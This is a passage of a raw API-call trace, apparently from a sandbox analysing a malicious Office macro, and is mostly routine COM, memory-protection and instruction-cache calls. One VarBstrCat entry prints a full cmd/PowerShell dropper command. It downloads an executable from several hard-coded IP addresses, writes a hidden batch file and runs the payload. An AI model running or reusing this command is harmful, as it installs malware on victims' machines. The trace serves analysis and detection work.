lpBaseAddress=0x6cabc08, dwSize=0x8) returned 1 [0042.233] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cabc09, dwSize=0x8) returned 1 [0042.233] GetCurrentProcess () returned 0xffffffffffffffff [0042.233] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cabc08, dwSize=0x8) returned 1 [0042.233] GetCurrentProcess () returned 0xffffffffffffffff [0042.233] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cabc18, dwSize=0x2) returned 1 [0042.233] GetCurrentProcess () returned 0xffffffffffffffff [0042.234] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cabc6c, dwSize=0x45) returned 1 [0042.234] VirtualProtect (in: lpAddress=0x6cabc6c, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x18190c | out: lpflOldProtect=0x18190c*=0x40) returned 1 [0042.234] GetCurrentProcess () returned 0xffffffffffffffff [0042.234] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac46c, dwSize=0x45) returned 1 [0042.234] VirtualProtect (in: lpAddress=0x6cac46c, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x18190c | out: lpflOldProtect=0x18190c*=0x40) returned 1 [0042.234] GetCurrentProcess () returned 0xffffffffffffffff [0042.234] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac4e9, dwSize=0x8) returned 1 [0042.234] GetCurrentProcess () returned 0xffffffffffffffff [0042.234] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac4e8, dwSize=0x8) returned 1 [0042.234] GetCurrentProcess () returned 0xffffffffffffffff [0042.234] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac4f8, dwSize=0x2) returned 1 [0042.234] GetCurrentProcess () returned 0xffffffffffffffff [0042.234] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac54c, dwSize=0x45) returned 1 [0042.234] VirtualProtect (in: lpAddress=0x6cac54c, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x18190c | out: lpflOldProtect=0x18190c*=0x40) returned 1 [0042.234] GetCurrentProcess () returned 0xffffffffffffffff [0042.234] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac5d4, dwSize=0x45) returned 1 [0042.234] VirtualProtect (in: lpAddress=0x6cac5d4, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x18190c | out: lpflOldProtect=0x18190c*=0x40) returned 1 [0042.234] GetCurrentProcess () returned 0xffffffffffffffff [0042.234] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac6b1, dwSize=0x8) returned 1 [0042.234] GetCurrentProcess () returned 0xffffffffffffffff [0042.234] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac6b0, dwSize=0x8) returned 1 [0042.234] GetCurrentProcess () returned 0xffffffffffffffff [0042.234] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac6c0, dwSize=0x2) returned 1 [0042.234] GetCurrentProcess () returned 0xffffffffffffffff [0042.234] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac714, dwSize=0x45) returned 1 [0042.234] VirtualProtect (in: lpAddress=0x6cac714, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x18190c | out: lpflOldProtect=0x18190c*=0x40) returned 1 [0042.234] GetCurrentProcess () returned 0xffffffffffffffff [0042.234] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac79c, dwSize=0x45) returned 1 [0042.234] VirtualProtect (in: lpAddress=0x6cac79c, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x18190c | out: lpflOldProtect=0x18190c*=0x40) returned 1 [0042.234] GetCurrentProcess () returned 0xffffffffffffffff [0042.234] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac819, dwSize=0x8) returned 1 [0042.234] GetCurrentProcess () returned 0xffffffffffffffff [0042.234] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac818, dwSize=0x8) returned 1 [0042.234] GetCurrentProcess () returned 0xffffffffffffffff [0042.234] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac828, dwSize=0x2) returned 1 [0042.235] GetCurrentProcess () returned 0xffffffffffffffff [0042.235] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac90c, dwSize=0x45) returned 1 [0042.235] VirtualProtect (in: lpAddress=0x6cac90c, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x18190c | out: lpflOldProtect=0x18190c*=0x40) returned 1 [0042.235] GetCurrentProcess () returned 0xffffffffffffffff [0042.235] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cac994, dwSize=0x45) returned 1 [0042.235] VirtualProtect (in: lpAddress=0x6cac994, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x18190c | out: lpflOldProtect=0x18190c*=0x40) returned 1 [0042.235] GetCurrentProcess () returned 0xffffffffffffffff [0042.235] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6caca11, dwSize=0x8) returned 1 [0042.235] GetCurrentProcess () returned 0xffffffffffffffff [0042.235] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6caca10, dwSize=0x8) returned 1 [0042.235] GetCurrentProcess () returned 0xffffffffffffffff [0042.235] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6caca20, dwSize=0x2) returned 1 [0042.235] GetCurrentProcess () returned 0xffffffffffffffff [0042.235] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6caca74, dwSize=0x45) returned 1 [0042.235] VirtualProtect (in: lpAddress=0x6caca74, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x18190c | out: lpflOldProtect=0x18190c*=0x40) returned 1 [0042.235] GetCurrentProcess () returned 0xffffffffffffffff [0042.235] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cacb5c, dwSize=0x45) returned 1 [0042.235] VirtualProtect (in: lpAddress=0x6cacb5c, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x18190c | out: lpflOldProtect=0x18190c*=0x40) returned 1 [0042.235] GetCurrentProcess () returned 0xffffffffffffffff [0042.235] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cacbd9, dwSize=0x8) returned 1 [0042.235] GetCurrentProcess () returned 0xffffffffffffffff [0042.235] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cacbd8, dwSize=0x8) returned 1 [0042.235] GetCurrentProcess () returned 0xffffffffffffffff [0042.235] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cacbe8, dwSize=0x2) returned 1 [0042.235] GetCurrentProcess () returned 0xffffffffffffffff [0042.235] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cacc3c, dwSize=0x45) returned 1 [0042.235] VirtualProtect (in: lpAddress=0x6cacc3c, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x18190c | out: lpflOldProtect=0x18190c*=0x40) returned 1 [0042.235] GetCurrentProcess () returned 0xffffffffffffffff [0042.235] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6caccc4, dwSize=0x45) returned 1 [0042.235] VirtualProtect (in: lpAddress=0x6caccc4, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x18190c | out: lpflOldProtect=0x18190c*=0x40) returned 1 [0042.235] IUnknown:AddRef (This=0x6a6e948) returned 0xa [0042.235] IUnknown:QueryInterface (in: This=0x6a6e948, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182cc8 | out: ppvObject=0x182cc8*=0x0) returned 0x80004002 [0042.235] IUnknown:QueryInterface (in: This=0x6a6e948, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182cc0 | out: ppvObject=0x182cc0*=0x0) returned 0x80004002 [0042.236] IUnknown:Release (This=0x6a6e948) returned 0x9 [0042.236] IUnknown:AddRef (This=0x6ccf078) returned 0x4 [0042.236] IUnknown:QueryInterface (in: This=0x6ccf078, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182cc8 | out: ppvObject=0x182cc8*=0x0) returned 0x80004002 [0042.236] IUnknown:QueryInterface (in: This=0x6ccf078, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182cc0 | out: ppvObject=0x182cc0*=0x0) returned 0x80004002 [0042.236] IUnknown:Release (This=0x6ccf078) returned 0x3 [0042.236] IUnknown:AddRef (This=0x6a6e9a8) returned 0x2 [0042.236] IUnknown:QueryInterface (in: This=0x6a6e9a8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182cc8 | out: ppvObject=0x182cc8*=0x0) returned 0x80004002 [0042.236] IUnknown:QueryInterface (in: This=0x6a6e9a8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182cc0 | out: ppvObject=0x182cc0*=0x0) returned 0x80004002 [0042.236] IUnknown:Release (This=0x6a6e9a8) returned 0x1 [0042.236] IUnknown:AddRef (This=0x6a6e8e8) returned 0xa [0042.236] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182cc8 | out: ppvObject=0x182cc8*=0x0) returned 0x80004002 [0042.236] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182cc0 | out: ppvObject=0x182cc0*=0x0) returned 0x80004002 [0042.236] IUnknown:Release (This=0x6a6e8e8) returned 0x9 [0042.236] IUnknown:AddRef (This=0x6ceee08) returned 0x5 [0042.236] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182cc8 | out: ppvObject=0x182cc8*=0x0) returned 0x80004002 [0042.236] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182cc0 | out: ppvObject=0x182cc0*=0x0) returned 0x80004002 [0042.236] IUnknown:Release (This=0x6ceee08) returned 0x4 [0042.236] IUnknown:AddRef (This=0x6ceeeb8) returned 0x6 [0042.236] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182cc8 | out: ppvObject=0x182cc8*=0x0) returned 0x80004002 [0042.236] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182cc0 | out: ppvObject=0x182cc0*=0x0) returned 0x80004002 [0042.236] IUnknown:Release (This=0x6ceeeb8) returned 0x5 [0042.236] VarBstrCat (in: bstrLeft="1", bstrRight="100", pbstrResult=0x183060 | out: pbstrResult=0x183060) returned 0x0 [0042.236] VarBstrCat (in: bstrLeft="cmd /c powershell \"'powershell \"\"function fmoke([string] $sut1){$tig1=1;try{(new-object system.net.webclient).downloadfile($sut1,''%tmp%\\tmp6149.exe'');}catch{$tig1=0;}return $tig1;}$mok1=@(''193.187.172.11'',''46.173.218.240'',''193.187.172.42'',''46.173.218.83'');foreach ($liu in $mok1){if(fmoke(''http://''+$liu+''/uncle_sam.php'') -eq 1){break;} } start-process ''%tmp%\\tmp6149.exe'';'\"\"| out-file -encoding ascii -filepath %tmp%\\tmp1971.bat; start-process '%tmp%\\tmp1971.bat' -windowstyle hidden\"", bstrRight="", pbstrResult=0x184a80 | out: pbstrResult=0x184a80) returned 0x0 [0042.237] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0042.237] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.237] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x181050, pDummy=0x0 | out: ppTypeAttr=0x181050, pDummy=0x0) returned 0x0 [0042.237] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.237] IUnknown:Release (This=0x6ceeeb8) returned 0x5 [0042.237] IUnknown:Release (This=0x6ceee08) returned 0x4 [0042.237] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x181798 | out: ppvObject=0x181798*=0x0) returned 0x80004002 [0042.237] IUnknown:AddRef (This=0x6ceeeb8) returned 0x7 [0042.237] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x181790, pDummy=0x10 | out: ppTypeAttr=0x181790, pDummy=0x10) returned 0x0 [0042.237] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.237] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceeeb8, index=0x0, pRefType=0x181788 | out: pRefType=0x181788*=0x1302) returned 0x0 [0042.237] ITypeInfo:GetRefTypeInfo (in: This=0x6ceeeb8, hreftype=0x1302, ppTInfo=0x1817a0 | out: ppTInfo=0x1817a0*=0x6ceef68) returned 0x0 [0042.237] IUnknown:Release (This=0x6ceeeb8) returned 0x6 [0042.237] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceef68, ppTypeAttr=0x181790, pDummy=0x181770 | out: ppTypeAttr=0x181790, pDummy=0x181770*=0x1817b0) returned 0x0 [0042.238] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceef68) returned 0x0 [0042.238] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceef68, index=0x0, pRefType=0x181788 | out: pRefType=0x181788*=0xf) returned 0x0 [0042.238] ITypeInfo:GetRefTypeInfo (in: This=0x6ceef68, hreftype=0xf, ppTInfo=0x1817a0 | out: ppTInfo=0x1817a0*=0x6bbd1c8) returned 0x0 [0042.238] IUnknown:Release (This=0x6ceef68) returned 0x0 [0042.238] ITypeInfo:RemoteGetTypeAttr (in: This=0x6bbd1c8, ppTypeAttr=0x181790, pDummy=0x181768 | out: ppTypeAttr=0x181790, pDummy=0x181768*=0xf) returned 0x0 [0042.238] ITypeInfo:LocalReleaseTypeAttr (This=0x6bbd1c8) returned 0x0 [0042.238] IUnknown:Release (This=0x6bbd1c8) returned 0x4 [0042.238] ITypeInfo:RemoteGetDocumentation (in: This=0x6ceeeb8, memid=0, refPtrFlags=0x181810, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x800000000 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x800000000) returned 0x0 [0042.238] IUnknown:Release (This=0x6ceeeb8) returned 0x6 [0042.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Value", cchWideChar=6, lpMultiByteStr=0x181720, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Value", lpUsedDefaultChar=0x0) returned 6 [0042.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Value") returned 0x104be4 [0042.238] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0042.238] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.238] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x181010, pDummy=0x0 | out: ppTypeAttr=0x181010, pDummy=0x0) returned 0x0 [0042.238] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.238] IUnknown:Release (This=0x6a6e8e8) returned 0xa [0042.238] IUnknown:Release (This=0x6a6e948) returned 0x9 [0042.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2d32, cbMultiByte=3, lpWideCharStr=0x1816f0, cchWideChar=4 | out: lpWideCharStr="fh") returned 3 [0042.238] ITypeComp:RemoteBind (in: This=0x6a6e8f0, szName="fh", lHashVal=0x105d3b, wFlags=0x5, ppTInfo=0x1816a8, pDescKind=0x1816bc, ppFuncDesc=0x1816c0, ppVarDesc=0x7feffd8c15f, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1816a8*=0x0, pDescKind=0x1816bc*=0, ppFuncDesc=0x1816c0, ppVarDesc=0x7feffd8c15f, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2d32, cbMultiByte=3, lpWideCharStr=0x181730, cchWideChar=4 | out: lpWideCharStr="fh") returned 3 [0042.238] ITypeComp:RemoteBind (in: This=0x6990970, szName="fh", lHashVal=0x105d3b, wFlags=0x5, ppTInfo=0x1816e8, pDescKind=0x1816fc, ppFuncDesc=0x181700, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1816e8*=0x0, pDescKind=0x1816fc*=0, ppFuncDesc=0x181700, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2d32, cbMultiByte=3, lpWideCharStr=0x181730, cchWideChar=4 | out: lpWideCharStr="fh") returned 3 [0042.238] ITypeComp:RemoteBind (in: This=0x6992860, szName="fh", lHashVal=0x105d3b, wFlags=0x5, ppTInfo=0x1816e8, pDescKind=0x1816fc, ppFuncDesc=0x181700, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1816e8*=0x0, pDescKind=0x1816fc*=0, ppFuncDesc=0x181700, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2d32, cbMultiByte=3, lpWideCharStr=0x181730, cchWideChar=4 | out: lpWideCharStr="fh") returned 3 [0042.239] ITypeComp:RemoteBind (in: This=0x6992e00, szName="fh", lHashVal=0x105d3b, wFlags=0x5, ppTInfo=0x1816e8, pDescKind=0x1816fc, ppFuncDesc=0x181700, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1816e8*=0x0, pDescKind=0x1816fc*=0, ppFuncDesc=0x181700, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.239] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="fh") returned 0x105d3b [0042.239] strcpy_s (in: _Dst=0x181690, _DstSize=0x3, _Src="fh" | out: _Dst="fh") returned 0x0 [0042.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x181690, cbMultiByte=3, lpWideCharStr=0x1814e0, cchWideChar=3 | out: lpWideCharStr="fh") returned 3 [0042.239] IUnknown:AddRef (This=0x6990960) returned 0xb [0042.239] ITypeLib:RemoteIsName (in: This=0x6990960, szNameBuf="fh", lHashVal=0x105d3b, pfName=0x1815b0, pBstrLibName=0x1814e0 | out: pfName=0x1815b0*=0, pBstrLibName=0x1814e0) returned 0x0 [0042.239] IUnknown:Release (This=0x6990960) returned 0xa [0042.239] IUnknown:AddRef (This=0x6992850) returned 0x12 [0042.239] ITypeLib:RemoteIsName (in: This=0x6992850, szNameBuf="fh", lHashVal=0x105d3b, pfName=0x1815b0, pBstrLibName=0x1814e0 | out: pfName=0x1815b0*=0, pBstrLibName=0x1814e0) returned 0x0 [0042.239] IUnknown:Release (This=0x6992850) returned 0x11 [0042.239] IUnknown:AddRef (This=0x6992df0) returned 0xd [0042.239] ITypeLib:RemoteIsName (in: This=0x6992df0, szNameBuf="fh", lHashVal=0x105d3b, pfName=0x1815b0, pBstrLibName=0x1814e0 | out: pfName=0x1815b0*=0, pBstrLibName=0x1814e0) returned 0x0 [0042.239] IUnknown:Release (This=0x6992df0) returned 0xc [0042.239] IUnknown:AddRef (This=0x6992580) returned 0x7 [0042.239] ITypeLib:RemoteIsName (in: This=0x6992580, szNameBuf="fh", lHashVal=0x105d3b, pfName=0x1815b0, pBstrLibName=0x1814e0 | out: pfName=0x1815b0*=0, pBstrLibName=0x1814e0) returned 0x0 [0042.239] IUnknown:Release (This=0x6992580) returned 0x6 [0042.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2d32, cbMultiByte=3, lpWideCharStr=0x181730, cchWideChar=4 | out: lpWideCharStr="fh") returned 3 [0042.239] ITypeComp:RemoteBind (in: This=0x6992590, szName="fh", lHashVal=0x105d3b, wFlags=0x5, ppTInfo=0x1816e8, pDescKind=0x1816fc, ppFuncDesc=0x181700, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1816e8*=0x0, pDescKind=0x1816fc*=0, ppFuncDesc=0x181700, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2d32, cbMultiByte=3, lpWideCharStr=0x181730, cchWideChar=4 | out: lpWideCharStr="fh") returned 3 [0042.240] ITypeComp:RemoteBind (in: This=0x6993ee0, szName="fh", lHashVal=0x105d3b, wFlags=0x5, ppTInfo=0x1816e8, pDescKind=0x1816fc, ppFuncDesc=0x181700, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1816e8*=0x0, pDescKind=0x1816fc*=0, ppFuncDesc=0x181700, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.240] IMalloc:Alloc (This=0x7feffc15380, cb=0xa) returned 0x6c348b0 [0042.240] _mbscpy_s (in: _Dst=0x6c348b0, _DstSizeInBytes=0x3, _Src=0x38a2d32 | out: _Dst=0x6c348b0) returned 0x0 [0042.240] strcpy_s (in: _Dst=0x181840, _DstSize=0xa, _Src="_B_var_fh" | out: _Dst="_B_var_fh") returned 0x0 [0042.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x181840, cbMultiByte=10, lpWideCharStr=0x181690, cchWideChar=10 | out: lpWideCharStr="_B_var_fh") returned 10 [0042.240] IUnknown:AddRef (This=0x6990960) returned 0xb [0042.240] ITypeLib:RemoteIsName (in: This=0x6990960, szNameBuf="_B_var_fh", lHashVal=0x10f1e3, pfName=0x181760, pBstrLibName=0x181690 | out: pfName=0x181760*=0, pBstrLibName=0x181690) returned 0x0 [0042.240] IUnknown:Release (This=0x6990960) returned 0xa [0042.240] IUnknown:AddRef (This=0x6992850) returned 0x12 [0042.240] ITypeLib:RemoteIsName (in: This=0x6992850, szNameBuf="_B_var_fh", lHashVal=0x10f1e3, pfName=0x181760, pBstrLibName=0x181690 | out: pfName=0x181760*=0, pBstrLibName=0x181690) returned 0x0 [0042.240] IUnknown:Release (This=0x6992850) returned 0x11 [0042.240] IUnknown:AddRef (This=0x6992df0) returned 0xd [0042.240] ITypeLib:RemoteIsName (in: This=0x6992df0, szNameBuf="_B_var_fh", lHashVal=0x10f1e3, pfName=0x181760, pBstrLibName=0x181690 | out: pfName=0x181760*=0, pBstrLibName=0x181690) returned 0x0 [0042.240] IUnknown:Release (This=0x6992df0) returned 0xc [0042.240] IUnknown:AddRef (This=0x6992580) returned 0x7 [0042.240] ITypeLib:RemoteIsName (in: This=0x6992580, szNameBuf="_B_var_fh", lHashVal=0x10f1e3, pfName=0x181760, pBstrLibName=0x181690 | out: pfName=0x181760*=0, pBstrLibName=0x181690) returned 0x0 [0042.240] IUnknown:Release (This=0x6992580) returned 0x6 [0042.240] IUnknown:AddRef (This=0x6993ed0) returned 0x7 [0042.240] ITypeLib:RemoteIsName (in: This=0x6993ed0, szNameBuf="_B_var_fh", lHashVal=0x10f1e3, pfName=0x181760, pBstrLibName=0x181690 | out: pfName=0x181760*=0, pBstrLibName=0x181690) returned 0x0 [0042.240] IUnknown:Release (This=0x6993ed0) returned 0x6 [0042.240] IUnknown:AddRef (This=0x6990960) returned 0xb [0042.240] IUnknown:Release (This=0x6990960) returned 0xa [0042.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5050896, cbMultiByte=10, lpWideCharStr=0x1816f0, cchWideChar=11 | out: lpWideCharStr="_B_var_fh") returned 10 [0042.240] ITypeComp:RemoteBind (in: This=0x6990970, szName="_B_var_fh", lHashVal=0x10f1e3, wFlags=0x5, ppTInfo=0x1816a8, pDescKind=0x1816bc, ppFuncDesc=0x1816c0, ppVarDesc=0x66005f00720061, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1816a8*=0x0, pDescKind=0x1816bc*=0, ppFuncDesc=0x1816c0, ppVarDesc=0x66005f00720061, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.240] _mbscpy_s (in: _Dst=0x1818b0, _DstSizeInBytes=0x3, _Src=0x38a2d32 | out: _Dst=0x1818b0) returned 0x0 [0042.240] IUnknown:Release (This=0x6a6e8e8) returned 0xa [0042.240] IUnknown:Release (This=0x6a6e948) returned 0x9 [0042.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2d56, cbMultiByte=11, lpWideCharStr=0x1816f0, cchWideChar=12 | out: lpWideCharStr="doveryboll") returned 11 [0042.240] ITypeComp:RemoteBind (in: This=0x6a6e8f0, szName="doveryboll", lHashVal=0x1034da, wFlags=0x1, ppTInfo=0x1816a8, pDescKind=0x1816bc, ppFuncDesc=0x1816c0, ppVarDesc=0x7feffd8c15f, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1816a8*=0x0, pDescKind=0x1816bc*=0, ppFuncDesc=0x1816c0, ppVarDesc=0x7feffd8c15f, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.241] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0042.241] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.241] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x180fd0, pDummy=0x0 | out: ppTypeAttr=0x180fd0, pDummy=0x0) returned 0x0 [0042.241] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.241] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0042.241] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.241] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x181210, pDummy=0x0 | out: ppTypeAttr=0x181210, pDummy=0x0) returned 0x0 [0042.241] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.241] IMalloc:Realloc (This=0x7feffc15380, pv=0x6703120, cb=0x112) returned 0x6cca5b0 [0042.241] IMalloc:Free (This=0x7feffc15380, pv=0x6ccffd0) [0042.241] GetCurrentProcess () returned 0xffffffffffffffff [0042.241] FlushInstructionCache (hProcess=0xffffffffffffffff, 